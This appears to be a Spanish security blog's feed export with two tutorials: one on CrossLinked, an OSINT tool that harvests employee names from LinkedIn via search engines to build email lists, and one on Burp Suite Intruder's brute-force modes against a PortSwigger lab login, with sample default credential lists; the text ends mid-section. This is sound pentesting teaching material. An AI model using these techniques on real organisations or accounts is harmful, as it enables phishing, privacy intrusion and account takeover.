tag:blogger.com,1999:blog-79386805187832128552024-03-18T14:53:33.131+01:00Flu Project | Zerolynx Cybersecurity BlogUn blog de ZerolynxJuan Antonio Calleshttp://www.blogger.com/profile/08021859006811664777noreply@blogger.comBlogger2333125tag:blogger.com,1999:blog-7938680518783212855.post-70418987077307447522024-03-18T09:00:00.004+01:002024-03-18T10:31:58.915+01:00CrossLinked – Herramienta OSINT para el descubrimiento de emails<p style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii64Rc-O2dbiHIE7B9McCAkMRB5nFAHKOgrRfs9F6tsGcqdInXqu-d-zdyZcF0xg697ZbuTYKAzxMz4-DFi8SqHIz1XJ4TVWhyphenhyphenPK_h0hINJt6xEAr0yf6KCwoGfqRrDtVXdjgiuwq1cZ778QlciyZoOcrYz02gApn2qJguQs2QCnMFxxWj1NnLU-kA07wT/s1920/CrossLinked%20%E2%80%93%20Herramienta%20OSINT%20para%20el%20descubrimiento%20de%20emails.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii64Rc-O2dbiHIE7B9McCAkMRB5nFAHKOgrRfs9F6tsGcqdInXqu-d-zdyZcF0xg697ZbuTYKAzxMz4-DFi8SqHIz1XJ4TVWhyphenhyphenPK_h0hINJt6xEAr0yf6KCwoGfqRrDtVXdjgiuwq1cZ778QlciyZoOcrYz02gApn2qJguQs2QCnMFxxWj1NnLU-kA07wT/w640-h360/CrossLinked%20%E2%80%93%20Herramienta%20OSINT%20para%20el%20descubrimiento%20de%20emails.jpg" width="640" /></a></div><br /><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una de las partes de la metodología OSINT consiste en encontrar información acerca de personas relacionadas con la organización objetivo. CrossLinked es una herramienta de código abierto que permite la enumeración de nombres válidos de usuarios y de cuentas de correo de una organización.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Esta herramienta utiliza el scraping de los distintos motores de búsqueda de Internet contra la aplicación LinkedIn. Esta técnica proporciona resultados precisos sin necesidad de usar claves de API y sin acceder directamente a LinkedIn.</span></p><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¿Cómo funciona?</span></h4><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Para poder utilizar esta herramienta en concreto, es necesario tener Python instalado en el sistema, más concretamente en su versión Pyhton3.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Para instalarla solo es necesario clonar el repositorio de la herramienta con la versión más actualizada del código:</span></p><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXhSWMiRWFQ0MnU-HIyzwQyhMzGn04KhYzwViqS6aqwDHuZ-wspExL_SSj87hlv0JdlN3ZfG_VEOnQbwdaW7ZtFfgS6vyXZNWZpVzp8ONwfPyhwA3W29Y-7HvOzD_lQLdUYV0HxrliZRMwYbGB6zEPd4jjP5eBQovV1jtQg0SWDrmHemVX5DShC4EAA7Xf/s548/Imagen1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="125" data-original-width="548" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXhSWMiRWFQ0MnU-HIyzwQyhMzGn04KhYzwViqS6aqwDHuZ-wspExL_SSj87hlv0JdlN3ZfG_VEOnQbwdaW7ZtFfgS6vyXZNWZpVzp8ONwfPyhwA3W29Y-7HvOzD_lQLdUYV0HxrliZRMwYbGB6zEPd4jjP5eBQovV1jtQg0SWDrmHemVX5DShC4EAA7Xf/w640-h146/Imagen1.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">De esta manera se creará una carpeta que contendrá los scripts que usa la herramienta y donde se guardarán por defecto los ficheros que se generan con cada uso.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Para poder usar CrossLinked hace falta tener claro que nomenclatura de cuentas usa la organización objetivo. Por ejemplo, para una organización que utiliza para sus correos corporativos la forma “{f}{apellido}@dominio.com” (la primera letra del nombre y el primer o segundo apellido), se introducirá así en la herramienta.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El formato que utiliza CrossLinked puede ser de tres tipos:</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipr-cfGI-1bM6DtsAns4wkg8swhZi5p6pfS0yoUwnK7D7pfnnHgNTtqe2atwIvtjk4SIralbwpYh6SMNa4ErxbPh7nWzVi6coTntBVUKkMYthwflASleOkHVU80sJIr6WIQ33jBmUqz000jn8oYXkDeLzjnPRL7bEJIH1GhQjXpXen2UoAPf5mRpLLy4pL/s462/Imagen2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="106" data-original-width="462" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipr-cfGI-1bM6DtsAns4wkg8swhZi5p6pfS0yoUwnK7D7pfnnHgNTtqe2atwIvtjk4SIralbwpYh6SMNa4ErxbPh7nWzVi6coTntBVUKkMYthwflASleOkHVU80sJIr6WIQ33jBmUqz000jn8oYXkDeLzjnPRL7bEJIH1GhQjXpXen2UoAPf5mRpLLy4pL/w640-h146/Imagen2.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Un ejemplo básico de uso podría ser:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJFSdTlM5-Et_RnlGw3a5BYhZTU35ZcwA9gywryX4SK_OL5mP0pHEDq_YJTt5H9F4ZT9IIl2E5hXt0d4QNCWVpFuRlrcvnNPQxgJgNaBzddvQDGOL5i2Za1kYWjsE5MtDS9rLqafA7qBilIzgkZDFi4J8hExcJ0zEGUpRmB8IEjmd6L9c56gsLPyndd3GT/s561/Imagen3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="61" data-original-width="561" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJFSdTlM5-Et_RnlGw3a5BYhZTU35ZcwA9gywryX4SK_OL5mP0pHEDq_YJTt5H9F4ZT9IIl2E5hXt0d4QNCWVpFuRlrcvnNPQxgJgNaBzddvQDGOL5i2Za1kYWjsE5MtDS9rLqafA7qBilIzgkZDFi4J8hExcJ0zEGUpRmB8IEjmd6L9c56gsLPyndd3GT/w640-h70/Imagen3.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Para especificar la nomenclatura se utiliza la opción -f, mientras que para especificar el nombre de los archivos que se generarán se utiliza la opción -o.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Adicionalmente, se recomienda que para obtener mejores resultados se añada inmediatamente seguido de la nomenclatura el nombre de la compañía tal y como aparece en LinkedIn, no el nombre de dominio. De la manera:</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_18_pS83wrbG2N2LcYhzrIW0xKifNYt2M0Z2nfWvdiePVh-TOYkMI6xnwRoQypovruAlMKlZYub5aRgf7x-aZIzqDHnzfYEPbRmcipqvMLE643yfz7DIumj4W0OwGJj281biu8RXJranFOk6RtAWev7sGC9tby06iGQGWHJ6gKlyO5KvzxRTw9OSZhDfb/s676/Imagen4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="73" data-original-width="676" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_18_pS83wrbG2N2LcYhzrIW0xKifNYt2M0Z2nfWvdiePVh-TOYkMI6xnwRoQypovruAlMKlZYub5aRgf7x-aZIzqDHnzfYEPbRmcipqvMLE643yfz7DIumj4W0OwGJj281biu8RXJranFOk6RtAWev7sGC9tby06iGQGWHJ6gKlyO5KvzxRTw9OSZhDfb/w640-h70/Imagen4.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Resultados</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El resultado de la ejecución sería algo como:</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc8w2ezCUXJ7pAemvrAbjvKBA-9ld-0J2VeDaPR-4Me65iNGRkHL8S3l46U69fAw-QXN5ca53K0se9Eg4igXGZ6hh9WuXwm7FTd_zLlV-zPdlkiHrVGrHnQWKGMKU2WxLYHJxZg2ykHwuF5UnlNSfALexzPm9njbsmRp8w8Gmvsc9QVysGSLN51xnbPw-r/s610/Imagen5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="436" data-original-width="610" height="458" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc8w2ezCUXJ7pAemvrAbjvKBA-9ld-0J2VeDaPR-4Me65iNGRkHL8S3l46U69fAw-QXN5ca53K0se9Eg4igXGZ6hh9WuXwm7FTd_zLlV-zPdlkiHrVGrHnQWKGMKU2WxLYHJxZg2ykHwuF5UnlNSfALexzPm9njbsmRp8w8Gmvsc9QVysGSLN51xnbPw-r/w640-h458/Imagen5.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una vez ejecutado, se generan dos tipos de ficheros:</span></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"><b>Archivo .txt</b> que almacena solo los nombres recopilados.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><b>Archivo .csv </b>que almacena toda la información obtenida (nombre, puesto de trabajo y Url del usuario en LinkedIn).</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Conclusión</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Existen varias herramientas OSINT muy conocidas para el reconocimiento de cuentas de correo, como puede ser Hunter.io, Snov.io o Harvester entre otras. Pero esta herramienta se puede utilizar sobre todo al comienzo de la fase de reconocimiento, ya que permite obtener información fiable sin necesidad de API keys o credenciales para su funcionamiento. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Además, al conectarse a LinkedIn para obtener la información, la convierte en una herramienta muy fiable que obtiene datos actualizados, con un 88 % en tiempo real y un 12 % restante en los últimos 29 días.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Por lo tanto, podemos considerar a CrossLinked como una herramienta muy recomendable para realizar esta parte del reconocimiento.</span></div></div><div style="text-align: justify;"><br /></div><div style="text-align: right;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.linkedin.com/in/javier-mu%C3%B1oz-rojas-5a316627b/">Javier Muñoz</a>, Analista de Ciberseguridad en <a href="http://www.zerolynx.com">Zerolynx.</a></span></div>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0tag:blogger.com,1999:blog-7938680518783212855.post-53695464854741227852024-03-11T09:00:00.015+01:002024-03-12T17:35:15.189+01:00Burpsuit: Intruder<p style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPw4iseCa1RwSqMgCHp40Uf4Nd7uBpia3tKLRGrsKWvc-iTUhoKrVlODRux60Tv17OCW-4pPYEQxEZIZQAeJMLLRCaRl70x0WF83OFUhzoUQOXVWIp4xO2LWumnwRrnbxrMaXKDKCOQs_pYq3TmDzY6_rtp-I8W8ivTfgokmKXcO3xw3IRbyWTNLPC5yyV/s1920/Burpsuit%20Intruder.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPw4iseCa1RwSqMgCHp40Uf4Nd7uBpia3tKLRGrsKWvc-iTUhoKrVlODRux60Tv17OCW-4pPYEQxEZIZQAeJMLLRCaRl70x0WF83OFUhzoUQOXVWIp4xO2LWumnwRrnbxrMaXKDKCOQs_pYq3TmDzY6_rtp-I8W8ivTfgokmKXcO3xw3IRbyWTNLPC5yyV/w640-h360/Burpsuit%20Intruder.png" width="640" /></a></div><span style="font-family: Barlow Semi Condensed;"><br /></span><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¡Buenas a todos!</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Hoy hablaremos de una de las herramientas más utilizadas y potentes dentro del propio Burp Suite para realizar auditorías Webs.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Burp Suite es una herramienta para probar la seguridad de aplicaciones web. Intercepta, examina y modifica solicitudes. Permite visualizar como se forma una petición, además de detectar vulnerabilidades comunes como inyecciones SQL y Cross-Site Scripting. Proporciona funcionalidades que permiten automatizar tareas comunes y personalizar flujos de trabajo. Es una herramienta versátil y poderosa.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El Intruder es un módulo interno de Burp Suite, este nos permite automatizar solicitudes, lo cual es muy útil a la hora de realizar fuzzing o tareas de fuerza bruta.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Nos permite tomar una solicitud (generalmente capturada en el Proxy antes de pasarla a Intruder) y usarla como plantilla para enviar muchas más solicitudes con valores ligeramente alterados de forma automática. Por ejemplo, al capturar una solicitud que contiene un intento de inicio de sesión, podríamos configurar Intruder para intercambiar los campos de nombre de usuario y contraseña por valores de una lista de palabras, lo que efectivamente nos permite forzar el formulario de inicio de sesión. De manera similar, podríamos pasar una lista de palabras para hacer fuzzing sobre subdirectorios, endpoints o hosts virtuales. Esta funcionalidad es muy similar a la que ofrecen herramientas como Wfuzz o Ffuf.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Los usos más comunes que se le dan al intruder son:</span></p><p style="text-align: justify;"></p><ul><li><span style="font-family: Barlow Semi Condensed;"><u>Fuzzing directorios o parámetros:</u> Buscando Identificar vulnerabilidades basadas en entradas.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><u>Enumerar subdominios:</u> Descubrir o aumentar una superficie de ataque adicional.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><u>Brute-forcing logins:</u> Automatizar combinaciones de nombre de usuario y contraseña.</span></li></ul><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Conociendo ahora sus principales funciones veremos cómo funciona con un ejemplo.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El primer paso será interceptar una petición a través del proxy que ofrece Burp Suite, para ello abriremos el browser que nos ofrece Burp Suite y activaremos la intercepción.</span></p><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn6d3r_Y0h64UftPlYYLvlefYycr7kexKUc2krtDJs1cjXEzaAO0QDDNUBGngk8uAp-z_FoK7aSUQ3191S0YlVNgZwqDGzAM2eoBnVxcGeuc_MdCgEdgKxj0AoepfW4jaoIrTBb23V8FrCeh6x_0R1RHtNRA5ZBlyzf8eqazoSHx0deG2k-fqVZm9l5Tc2/s1000/CapturaInterceptarProxy.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="741" data-original-width="1000" height="474" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn6d3r_Y0h64UftPlYYLvlefYycr7kexKUc2krtDJs1cjXEzaAO0QDDNUBGngk8uAp-z_FoK7aSUQ3191S0YlVNgZwqDGzAM2eoBnVxcGeuc_MdCgEdgKxj0AoepfW4jaoIrTBb23V8FrCeh6x_0R1RHtNRA5ZBlyzf8eqazoSHx0deG2k-fqVZm9l5Tc2/w640-h474/CapturaInterceptarProxy.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></p><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Para la prueba usaremos un laboratorio de portswigger que nos permitiría practicar ataques con el Intruder. En este caso nos iremos a la página de login donde podemos realizar ataque de fuerza bruta sobre el login.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGx1B_NhcktF35FkKGT9IZ8m0AokqmOLiYqODH7NoPmO1-Ql6YZtjPHhIfXi67xAjiNe5cPCI5OndYQK8IIn3_Ur3wN7t6q2W7EPaSI40MtArwkGkoD8BU1Hurs88gxHX-Iiip_5Am1xB92WO4RxxYkWuEGah5oTIbWUPQAK248L_YeTa8trnoFMPtlMIP/s1292/AcessoConcedido.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="582" data-original-width="1292" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGx1B_NhcktF35FkKGT9IZ8m0AokqmOLiYqODH7NoPmO1-Ql6YZtjPHhIfXi67xAjiNe5cPCI5OndYQK8IIn3_Ur3wN7t6q2W7EPaSI40MtArwkGkoD8BU1Hurs88gxHX-Iiip_5Am1xB92WO4RxxYkWuEGah5oTIbWUPQAK248L_YeTa8trnoFMPtlMIP/w640-h288/AcessoConcedido.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Con el proxy activado, pincharemos sobre log in para interceptar la petición de la página prueba que hemos utilizado.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzC5IVOzc5WWswksNKtGmzJCXowaIm56hiRcjkHU45R-NMvRRX4SodorlZiZeiEI709gOxcmUia0cr2av9i5BHttqt147jotlGp6N7vMEedGsapBWAS4qQDD_akuoLVCerjBRrY4ifMYUmBbYnfUwwsVK-yahsqP8_Rt_q-NWHcPi8GzrnE2qc1_UMM9Jk/s1107/envioAlIntruder.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="570" data-original-width="1107" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzC5IVOzc5WWswksNKtGmzJCXowaIm56hiRcjkHU45R-NMvRRX4SodorlZiZeiEI709gOxcmUia0cr2av9i5BHttqt147jotlGp6N7vMEedGsapBWAS4qQDD_akuoLVCerjBRrY4ifMYUmBbYnfUwwsVK-yahsqP8_Rt_q-NWHcPi8GzrnE2qc1_UMM9Jk/w640-h330/envioAlIntruder.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una vez capturada la petición la mandamos al Intruder donde realizaremos el ataque.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR8bD9srOt-IijBLHi6VZPrgl7S_cz8wxZNTloIOaVzNqTocbjqoM-o0EX5L7SqWNGwR0zeixifyTcDv4xV6oP4rfmDQsMjJS4O8P7vEGQLZTJWZ2wpHxsvkPPsmfSEG51BzB4ixg1wttEFD-OkNMFwRNTX_MsqmMAjQd-80jIL1eY7dJOg4hU887rYQJl/s1106/TiposAtaques.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="478" data-original-width="1106" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR8bD9srOt-IijBLHi6VZPrgl7S_cz8wxZNTloIOaVzNqTocbjqoM-o0EX5L7SqWNGwR0zeixifyTcDv4xV6oP4rfmDQsMjJS4O8P7vEGQLZTJWZ2wpHxsvkPPsmfSEG51BzB4ixg1wttEFD-OkNMFwRNTX_MsqmMAjQd-80jIL1eY7dJOg4hU887rYQJl/w640-h276/TiposAtaques.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Desde el Intruder podemos elegir qué tipo de ataque queremos, pudiendo diferenciar 4 distintos:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">1. Sniper:</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Intruder tomará cada payload que le pasemos (de una lista de payloads) y la colocará en cada posición definida por turno. Es decir, pasará cada payload de la lista en cada parámetro por turno.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Ejemplo: si tenemos una petición que tiene 2 parámetros username y password y tenemos una lista de palabras que serían: burp, suite e intruder. Las solicitudes serian así:</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3ikaFT7NdY1jt4bnTFIICJmXlk00hEhfMkRTV2ed1JL86wne6DnBIQbY9HYNo4kGRLMZ_YjRtjDqZAZ9Dlh-JgQ3_RYHYjQ8-QTlJ9kqWylcdlAz1AQSZ23ySs4VZLDEu94mPJnOtGnO3BdAYQyiAlE7zuvgOobe89w254Th2sFDlA5OoKfPiRjUlILlT/s999/Imagen1.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="263" data-original-width="999" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3ikaFT7NdY1jt4bnTFIICJmXlk00hEhfMkRTV2ed1JL86wne6DnBIQbY9HYNo4kGRLMZ_YjRtjDqZAZ9Dlh-JgQ3_RYHYjQ8-QTlJ9kqWylcdlAz1AQSZ23ySs4VZLDEu94mPJnOtGnO3BdAYQyiAlE7zuvgOobe89w254Th2sFDlA5OoKfPiRjUlILlT/w640-h168/Imagen1.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div class="separator" style="clear: both; text-align: center;"><h3 style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">2. Battering Ram:</span></h3><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Toma un conjunto de payloads (por ejemplo, una lista de palabras). Donde se coloca la misma carga útil en cada posición (parámetro).</span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Ejemplo: si tenemos una petición que tiene 2 parámetros username y password y tenemos una lista de palabras que serían: burp, suite e intruder. Las solicitudes serian así:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyJcfbIzZwF28X2CRpm8eHNV5ZKNPW-0m3PKJ_AAn06hOq3P2TCSVRfnCRadkuBaDGaxZXmHxbJic91sbRN8FHlBEuF5yZN21K9SRTud2ULFZ82qT9wGvMmbvRMJsV57FRd8fhcgBhChmYUJs9nKDF76LuAp8IOi5ROFeZBuy2H3RLZCSLESP-6mVXjQbI/s1038/2024-03-12%2013_47_07-Post_Flu_Intruder%20-%20Word.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="168" data-original-width="1038" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyJcfbIzZwF28X2CRpm8eHNV5ZKNPW-0m3PKJ_AAn06hOq3P2TCSVRfnCRadkuBaDGaxZXmHxbJic91sbRN8FHlBEuF5yZN21K9SRTud2ULFZ82qT9wGvMmbvRMJsV57FRd8fhcgBhChmYUJs9nKDF76LuAp8IOi5ROFeZBuy2H3RLZCSLESP-6mVXjQbI/w640-h104/2024-03-12%2013_47_07-Post_Flu_Intruder%20-%20Word.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">3. Pitchfork:</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Pitchfork usa un conjunto de payloads por posición y los recorre todos a la vez. Idealmente, nuestros conjuntos de payloads deberían tener la misma longitud cuando se trabaja en Pitchfork, ya que Intruder dejará de probar tan pronto como se complete una de las listas. Por ejemplo, si tenemos dos listas, una con 100 líneas y otra con 90 líneas, Intruder solo hará 90 solicitudes y los diez elementos finales de la primera lista no se probarán.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Ejemplo: si tenemos una petición que tiene 2 parámetros username y password y tenemos dos listas de palabras que sería la primera lista de nombres: </span></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;">admin</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">root</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Administrator</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Y la segunda lista de contraseñas:</span></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;">P@ssw0rd</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">toor</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">123456</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Las solicitudes serian así:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixpYpXsSPyNoq4Gj9L8aEnrSt2Y5UTcSqvH0SIFME9X08JiS30WUr95yyqUpACjRfeFmc042-tlvS1t2OfF9JKrp6bfgC5S4vCgNbDqwRFoPouC9IjZZEKHCD0FTF_z3_Gbc7Bskq_IGsytjdjS2NMxGEK_sAJwG7stRvk03o3jM8QgI42c5mAjYuj7GJV/s992/2024-03-12%2015_21_58-Post_Flu_Intruder%20-%20Word.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="153" data-original-width="992" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixpYpXsSPyNoq4Gj9L8aEnrSt2Y5UTcSqvH0SIFME9X08JiS30WUr95yyqUpACjRfeFmc042-tlvS1t2OfF9JKrp6bfgC5S4vCgNbDqwRFoPouC9IjZZEKHCD0FTF_z3_Gbc7Bskq_IGsytjdjS2NMxGEK_sAJwG7stRvk03o3jM8QgI42c5mAjYuj7GJV/w640-h98/2024-03-12%2015_21_58-Post_Flu_Intruder%20-%20Word.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">4. Cluster Bomb:</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi 